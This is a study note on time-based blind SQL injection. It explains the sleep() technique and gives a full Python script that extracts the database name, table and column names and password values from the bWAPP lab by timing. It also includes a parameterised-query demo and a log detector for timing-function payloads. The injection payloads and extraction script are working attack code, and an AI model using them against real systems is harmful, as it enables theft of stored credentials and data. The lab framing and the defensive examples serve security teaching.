
Web Security (2): SQL Injection [Part 3]


Note: this article is a personal study note, shared for learning and discussion only.




Time-based blind injection


A specific statement is injected and success is judged from a physical side effect of the page request rather than from its content: for example, the SQL statement is made to call sleep(), and the page load time reveals whether the injection point exists.
Applicable scenario: the execution result cannot be read from the displayed page; often it is not even possible to tell whether the injected statement was executed at all.





Principle


select * from user where id= ' ?'


The user input is replaced with: 4' and sleep(3) -- '

The SQL statement actually executed:


select * from user where id= '4' and sleep(3) -- ''

When id=4 exists, the query sleeps for 3 seconds.

When id=4 does not exist, the query returns immediately: the concatenated SQL only reaches the trailing sleep if the condition before it holds, and since that earlier condition fails (no such row), sleep(3) is not executed.
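As an added example (not code from the original post): the concatenated query and the input above, run against an in-memory SQLite database, next to the parameterised form of the same query. The table rows and the stand-in sleep() that only records its calls are constructed for the demo; it shows that the injected sleep() executes in the concatenated version and never in the parameterised one.

```python
import sqlite3

# Constructed demo, not code from the original post: the input from the post,
# 4' and sleep(3) -- ', against the same concatenated query and against a
# parameterised one. The table contents and the sleep() stand-in are made up.
USER_INPUT = "4' and sleep(3) -- '"

sleep_calls = []  # every invocation of the stand-in sleep() lands here


def fake_sleep(n):
    # Stand-in for MySQL's sleep(): records the call instead of pausing,
    # and returns 0 just like the real function does.
    sleep_calls.append(n)
    return 0


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.create_function("sleep", 1, fake_sleep)
    conn.execute("create table user(id text, name text)")
    conn.executemany("insert into user values (?, ?)",
                     [("4", "alice"), ("5", "bob")])
    return conn


def vulnerable_query(conn, user_input):
    # The post's pattern: the input is pasted into the SQL text, so its quote
    # closes the literal and the remainder runs as SQL (sleep() fires).
    sql = "select * from user where id= '%s'" % user_input
    return sql, conn.execute(sql).fetchall()


def safe_query(conn, user_input):
    # Parameterised: the whole input is bound as one string value and is only
    # ever compared against id, never parsed as SQL.
    sql = "select * from user where id= ?"
    return sql, conn.execute(sql, (user_input,)).fetchall()


if __name__ == "__main__":
    db = make_db()
    print(vulnerable_query(db, USER_INPUT), "sleep calls:", sleep_calls)
    print(safe_query(db, USER_INPUT), "sleep calls:", sleep_calls)
```

The vulnerable call produces exactly the statement shown above and invokes sleep(); the parameterised call with the same input returns no rows and never touches sleep(), while a plain "4" still finds the row.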







Commonly used functions


substr(a,b,c): take c characters of string a, starting at position b
count(): count the total number of rows
ascii(): return the ASCII code of a character
length(): return the length of a string
left(a,b): take the first b characters of string a, from the left
sleep(n): pause execution for n seconds






Example


Choose the time-based blind injection page (bWAPP, sqli_15.php).


With normal input the response takes about 1 second; once the sleep function is appended the time changes, which shows that a time-based blind injection exists. The value before "and" must exist in the database, otherwise the statement after "and" is never executed.


Python script

import requests
from urllib.parse import quote

headers = {
    'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0) Gecko/20100101 Firefox/83.0',
    'Referer': 'http://127.0.0.1/bwapp/bwapp/sqli_15.php',
    'Cookie': 'security_level=0; PHPSESSID=hlk1q0q4m2qn6d8rtnhcs0gr65'
}


def guest_db_len():
    # Guess the length of the current database name, one candidate per request.
    len_of_db = 0
    print('猜解数据库长度')
    for i in range(1, 6):
        url = 'http://127.0.0.1/bwapp/bwapp/sqli_15.php?title='
        title = '''Man of Steel' and if(length(database())=%s,sleep(3),1)#''' % i
        title = quote(title)
        url = url + title
        r = requests.get(url, headers=headers)
        # r.elapsed measures from sending the request until the response
        # headers have been parsed; .seconds is the whole-seconds part of
        # that timedelta, so the 2.5 threshold effectively means 3 s or more
        if (r.elapsed.seconds > 2.5):
            print('length of database:', i)
            len_of_db = i
            break
    return len_of_db


def guest_db_name(len_of_db):
    # Guess the database name character by character by comparing ASCII codes.
    name_db = ''
    char_list = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ'
    print('猜解数据库名称')
    for i in range(1, len_of_db + 1):
        for k in char_list:
            k1 = ord(k)
            url = 'http://127.0.0.1/bwapp/bwapp/sqli_15.php?title='
            title = '''Man of Steel' and if(ascii(mid(database(),%s,1))=%s,sleep(5),1)#''' % (i, k1)
            url = url + quote(title)
            r = requests.get(url, headers=headers)
            if (r.elapsed.seconds > 4.5):
                name_db = name_db + k
                print('第%s位:%s' % (i, k))
    print('name of database:', name_db)


def guest_table_name_len():
    # First guess the total length of the comma-joined table names,
    # then guess that string character by character.
    len_of_tables = 0
    char_list = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ,'
    tables_name = ''
    print('表长度的总和')
    for i in range(2, 40):
        url = 'http://127.0.0.1/bwapp/bwapp/sqli_15.php?title='
        title = '''Man of Steel' and if((select length(group_concat(table_name)) from information_schema.tables where table_schema='bWAPP')=%s,sleep(5),1)#''' % i
        title = quote(title)
        url = url + title
        r = requests.get(url, headers=headers)
        # same timing check as above: a delayed response means the guess was right
        if (r.elapsed.seconds > 4.5):
            print('length of tables:', i)
            len_of_tables = i
            break
    print('猜解数据库名称')
    for i in range(1, len_of_tables + 1):
        for k in char_list:
            k1 = ord(k)
            url = 'http://127.0.0.1/bwapp/bwapp/sqli_15.php?title='
            title = '''Man of Steel' and if(ascii(mid((select group_concat(table_name) from information_schema.tables where table_schema='bWAPP'),%s,1))=%s,sleep(5),1)#''' % (i, k1)
            title = quote(title)
            url = url + title
            r = requests.get(url, headers=headers)
            if (r.elapsed.seconds > 4.5):
                tables_name = tables_name + k
                print('第%s位:%s' % (i, k))
    print('name of tables:', tables_name)


def guest_name_columns():
    # Same two-step approach for the column names of the users table.
    len_of_columns = 0
    char_list = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ,'
    columns_name = ''
    print('列长度的总和')
    for i in range(2, 200):
        url = 'http://127.0.0.1/bwapp/bwapp/sqli_15.php?title='
        title = '''Man of Steel' and if((select length(group_concat(column_name)) from information_schema.columns where table_name='users')=%s,sleep(5),1)#''' % i
        title = quote(title)
        url = url + title
        r = requests.get(url, headers=headers)
        if (r.elapsed.seconds > 4.5):
            print('length of columns:', i)
            len_of_columns = i
            break
    print('猜解列名称')
    for i in range(1, len_of_columns + 1):
        for k in char_list:
            k1 = ord(k)
            url = 'http://127.0.0.1/bwapp/bwapp/sqli_15.php?title='
            title = '''Man of Steel' and if(ascii(mid((select group_concat(column_name) from information_schema.columns where table_name='users'),%s,1))=%s,sleep(5),1)#''' % (i, k1)
            title = quote(title)
            url = url + title
            r = requests.get(url, headers=headers)
            if (r.elapsed.seconds > 4.5):
                columns_name = columns_name + k
                print('第%s位:%s' % (i, k))
    print('name of columns:', columns_name)


def guest_columns_content():
    # Same two-step approach for the contents of one column (digits added to
    # the alphabet because the values may contain numbers).
    len_columns_content = 0
    char_list = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ,1234567890'
    columns_content = ''
    columns_name = 'password'
    print('列内容长度的总和')
    for i in range(2, 400):
        url = 'http://127.0.0.1/bwapp/bwapp/sqli_15.php?title='
        title = '''Man of Steel' and if((select length(group_concat(%s)) from users)=%s,sleep(5),1)#''' % (columns_name, i)
        title = quote(title)
        url = url + title
        r = requests.get(url, headers=headers)
        if (r.elapsed.seconds > 4.5):
            print('length of columns content:', i)
            len_columns_content = i
            break
    print('列的内容')
    for i in range(1, len_columns_content + 1):
        for k in char_list:
            k1 = ord(k)
            url = 'http://127.0.0.1/bwapp/bwapp/sqli_15.php?title='
            title = '''Man of Steel' and if(ascii(mid((select group_concat(%s) from users),%s,1))=%s,sleep(5),1)#''' % (columns_name, i, k1)
            title = quote(title)
            url = url + title
            r = requests.get(url, headers=headers)
            if (r.elapsed.seconds > 4.5):
                columns_content = columns_content + k
                print('第%s位:%s' % (i, k))
    print('columns_content:', columns_content)


if __name__ == '__main__':
    guest_db_name(5)
    guest_table_name_len()
    guest_name_columns()
    guest_columns_content()
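As an added defender-side example (not code from the original post): the script above sends one request per candidate length or character, each carrying sleep() inside the title parameter, and reads the answer from the response time. The function below parses constructed nginx-style access log lines (client, request line, status, request time in seconds; all values are made up), percent-decodes the query string, flags parameters that carry a timing function, and marks which responses were delayed using the same 2.5 s cut-off the script uses.

```python
import re
from urllib.parse import urlparse, parse_qs

# Constructed nginx-style access log lines, not from the original post: client,
# request line, status and $request_time in seconds. Lines 2 and 3 carry the
# database-length probe sent by the script above; the others are normal views.
LOG_LINES = """\
10.0.0.7 "GET /bwapp/bwapp/sqli_15.php?title=Man%20of%20Steel HTTP/1.1" 200 0.93
10.0.0.9 "GET /bwapp/bwapp/sqli_15.php?title=Man%20of%20Steel%27%20and%20if%28length%28database%28%29%29%3D4%2Csleep%283%29%2C1%29%23 HTTP/1.1" 200 1.02
10.0.0.9 "GET /bwapp/bwapp/sqli_15.php?title=Man%20of%20Steel%27%20and%20if%28length%28database%28%29%29%3D5%2Csleep%283%29%2C1%29%23 HTTP/1.1" 200 4.05
10.0.0.7 "GET /bwapp/bwapp/portal.php HTTP/1.1" 200 0.12
"""

LINE_RE = re.compile(r'^(\S+) "(?:GET|POST) (\S+) HTTP/[\d.]+" (\d{3}) ([\d.]+)$')
# Delay functions that have no legitimate place inside a web parameter.
TIMING_RE = re.compile(r"\b(sleep|benchmark|pg_sleep|waitfor)\s*\(", re.I)


def find_probes(log_text, slow_after=2.5):
    """One finding per request whose decoded parameters contain a timing
    function; `slow` uses the script's 2.5 s cut-off for a fired sleep()."""
    findings = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # not an access-log line we understand
        client, target, _status, seconds = m.groups()
        # parse_qs percent-decodes, so sleep%283%29 is seen as sleep(3)
        params = parse_qs(urlparse(target).query, keep_blank_values=True)
        for name, values in params.items():
            for value in values:
                hit = TIMING_RE.search(value)
                if hit:
                    findings.append({"client": client, "param": name,
                                     "function": hit.group(1).lower(),
                                     "seconds": float(seconds),
                                     "slow": float(seconds) > slow_after})
    return findings


def summarize(findings):
    """Per-client counts: probes sent, and how many delayed the response."""
    summary = {}
    for f in findings:
        entry = summary.setdefault(f["client"], {"probes": 0, "slow": 0})
        entry["probes"] += 1
        entry["slow"] += int(f["slow"])
    return summary
```

On the sample lines, find_probes(LOG_LINES) reports both probes from 10.0.0.9, only the second of which was slow; a real run would alert on the per-client probe count, since the script needs dozens of such requests per extracted character.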

Reference: Gond19 on CSDN





- End -

